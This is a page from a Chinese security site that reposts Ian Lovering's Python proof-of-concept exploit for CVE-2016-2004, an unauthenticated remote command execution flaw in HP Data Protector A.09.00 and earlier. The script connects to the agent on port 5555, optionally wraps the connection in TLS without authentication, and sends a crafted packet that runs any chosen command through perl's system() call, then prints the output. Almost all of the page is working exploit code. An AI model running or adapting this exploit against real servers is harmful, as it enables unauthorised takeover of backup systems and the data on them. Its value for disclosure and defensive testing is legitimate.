首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Data Protector A.09.00 - Arbitrary Command Execution
来源:vfocus.net 作者:IanLovering 发布时间:2016-05-30  
#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
 
#   This proof of concept demonstrates that enabling encrypted control communication on
#   Data Protector agents does not provide any additional security.
#   As is provides no authentication it is not a viable workaround to prevent the
#   exploitation of well known Data Protector issues such as cve-2014-2623
#
#   This exploit establishes and unauthenticated encrypted communication channel to
#   a Data Protector Agent and uses a well known unencrypted Data Protector vulnerability
#   to run arbitrary commands on the target.
 
#   Tested on Kali Linux 2 with python 2.7.9
#   Tested against Data Protector A.09.00 (Internal Build version 88) with encrypted control
#   communication enabled.
#   All other Data Protector settings are default.
#   Tested against Data Protector agent running on Windows 2008 R2
#   Also tested against Data Protector A.07
#
#   encrypted-dataprotector.py -e <ipaddress>
#
#   By default runs ipconfig on the target.
#   Can take a little while to return. Have patience ;)
#
#   CVE-2016-2004
 
import socket
import ssl
import time
import struct
import argparse
 
 
parser = argparse.ArgumentParser(prog='test-encrypt.py')
parser.add_argument('-e', '--encrypt', dest='encrypt', action='store_true')
parser.add_argument('-p', '--port', type=int)
parser.add_argument('-c', '--command')
parser.add_argument('ipaddress')
parser.set_defaults(encrypt=False,port=5555)
args = parser.parse_args()
 
HOST = args.ipaddress
PORT = args.port
 
command = 'ipconfig'
 
if args.command:
    command = args.command
 
# initialise data
initdata = ("\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00"
        "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00"
        "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00"
        "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00"
        "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00")
 
OFFSET = 46
command = command.replace("\\", "\\\\")
command = command.replace("\'", "\\\'")
command_length = struct.pack(">I",OFFSET + len(command))
payload = command_length         +\
    "\x32\x00\x01\x01\x01\x01\x01\x01" +\
    "\x00\x01\x00\x01\x00\x01\x00\x01" +\
    "\x01\x00\x20\x32\x38\x00\x5c\x70" +\
    "\x65\x72\x6c\x2e\x65\x78\x65\x00" +\
    "\x20\x2d\x65\x73\x79\x73\x74\x65" +\
    "\x6d('%s')\x00" % command
 
def get_data(sock):
    response = ''
    recv_len =1
     
    while recv_len:
        data = sock.recv(4096)
        recv_len = len(data)
        response += data
        if recv_len < 4096:
            break
     
    return response
 
def get_dp_response(sock):
 
    print "===== Response ====="
    print
 
    while True:
 
        # Get information about response
        packed_length = sock.recv(4)
        if not packed_length:
            break
        n = struct.unpack(">I", packed_length)[0]
        tmpresponse = sock.recv(n)
        tmpresponse = tmpresponse.replace("\n", "")
        tmpresponse = tmpresponse.replace("\x00", "")
        tmpresponse = tmpresponse.replace("\xff\xfe\x39\x20", "")
        if tmpresponse.upper().find("*RETVAL*") != -1:
            break
        else:
            print tmpresponse
 
    print
    print "===== End ====="
    print
 
 
client = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
 
if args.encrypt:
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    context.set_ciphers('ALL')
 
try:
    client.connect(( HOST, PORT ))
    print "Connected"
 
    if args.encrypt:
        # send data protector init string
        client.send(initdata)
        response = get_data(client)
 
        # setup tls
        client = context.wrap_socket(client)
        print "Encryption Enabled"
     
    # send payload
    client.send(payload)
    print "Sent Payload"
    print ""
    print "===== Command ====="
    print
    print command
    print
    get_dp_response(client)
 
    client.close()
 
except Exception as e:
    print '[*] Exception. Exiting.'
    print e
    client.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Micro Focus Rumba+ 9.4 - Multi
·WordPress Ninja Forms Unauthen
·Ubiquiti airOS Arbitrary File
·MySQL 5.5.45 - procedure analy
·Oracle ATS Arbitrary File Uplo
·FlatPress 1.0.3 - CSRF Arbitra
·Teampass 2.1.25 Arbitrary File
·CCextractor 0.80 - Crash PoC
·Teampass 2.1.25 Unauthenticate
·TCPDump 4.5.1 - Crash PoC
·Linknat VOS3000/VOS2009 SQL In
·HP Data Protector A.09.00 - En
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved